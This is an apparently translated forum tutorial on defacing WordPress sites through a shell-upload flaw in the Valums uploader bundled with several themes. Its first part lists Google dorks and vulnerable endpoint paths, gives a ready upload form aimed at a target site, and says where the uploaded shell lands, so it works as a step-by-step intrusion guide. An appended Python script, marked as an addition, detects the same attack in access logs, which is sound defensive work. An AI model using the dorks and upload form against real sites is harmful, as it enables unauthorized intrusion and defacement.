
Defacing with the WordPress Valums Uploader Shell Upload eXploit





Tutorial: defacing with the WordPress Valums Uploader Shell Upload eXploit.
This exploit abuses a bug in the valums uploader bundled with these themes.

1. Dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. Dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. Dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. Dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. Dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. Dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. Dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php


How to: go straight to Google and search using the dorks above.

A vulnerable site looks like this.. it shows the text {"error":"No files were uploaded.",



Then create the CSRF form in Notepad and save it with an .html extension


<form enctype="multipart/form-data" action="target.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="qqfile" type="file" /><br /><input type="submit" value="upload" /></form>

If you can't be bothered to make one, you can use this one: Click here

Any CSRF form will do.. here is an example site where the file was uploaded successfully.




Shell access path: /wp-content/uploads/year/month/shellname.php
example: target.com/wp-content/uploads/2016/12/nueenggak.php
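As an added example (not part of the original post), here is a Python script that checks web-server access logs for the indicators this write-up describes from the site owner's side: any request to a theme's valums_uploader/php.php endpoint (the bare GET that returns the "No files were uploaded" JSON is the probe), POSTs to that endpoint (the upload itself), and later requests for .php files under /wp-content/uploads/, where the uploaded file lands. It assumes the server writes the common "combined" log format; the log lines below are constructed samples, not taken from any real server.

```python
import re

# Endpoint suffix shared by every theme path listed in the write-up above.
UPLOADER_SUFFIX = "/valums_uploader/php.php"
# Where the write-up says the uploaded file ends up.
UPLOADS_PREFIX = "/wp-content/uploads/"

# Assumption: the web server writes the Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample lines for demonstration only (RFC 5737 test addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2016:10:15:01 +0000] "GET /wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php HTTP/1.1" 200 38
203.0.113.5 - - [10/Dec/2016:10:15:40 +0000] "POST /wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php HTTP/1.1" 200 17
203.0.113.5 - - [10/Dec/2016:10:16:02 +0000] "GET /wp-content/uploads/2016/12/nueenggak.php HTTP/1.1" 200 512
198.51.100.7 - - [10/Dec/2016:11:00:00 +0000] "GET /wp-content/uploads/2016/12/photo.jpg HTTP/1.1" 200 20480
198.51.100.7 - - [10/Dec/2016:11:00:05 +0000] "GET /index.php HTTP/1.1" 200 9000
"""


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def strip_query(path):
    """Drop any ?query=string so suffix/prefix checks see only the path."""
    return path.split("?", 1)[0]


def analyze(log_text):
    """Return the three indicator lists plus the IPs that both POSTed to the
    uploader endpoint and later fetched a .php file from the uploads directory."""
    probes, uploads, shell_hits, confirmed = [], [], [], []
    uploaded_from = set()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        path = strip_query(rec["path"])
        ip = rec["ip"]
        if path.endswith(UPLOADER_SUFFIX):
            probes.append(rec)                      # any touch of the uploader script
            if rec["method"] == "POST":
                uploads.append(rec)                 # an actual upload attempt
                uploaded_from.add(ip)
        elif path.startswith(UPLOADS_PREFIX) and path.lower().endswith(".php"):
            shell_hits.append(rec)                  # PHP executed from uploads/
            if ip in uploaded_from and ip not in confirmed:
                confirmed.append(ip)                # upload followed by execution
    return {"probes": probes, "uploads": uploads,
            "shell_hits": shell_hits, "confirmed": confirmed}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for key in ("probes", "uploads", "shell_hits"):
        for rec in result[key]:
            print(f"{key:10s} {rec['ip']:15s} {rec['method']:4s} {rec['path']}")
    print("upload-then-execute from:", result["confirmed"])
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. A single probe is worth an alert on its own, because the endpoint has no legitimate unauthenticated use; a "confirmed" IP means a file was both uploaded and executed, so the uploads directory should be inspected for PHP files and the theme's uploader script removed. Blocking PHP execution under /wp-content/uploads/ at the web-server level closes the execution half of this chain regardless of which theme shipped the uploader.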


Hopefully this is useful.. thank you. See you in the next tutorial

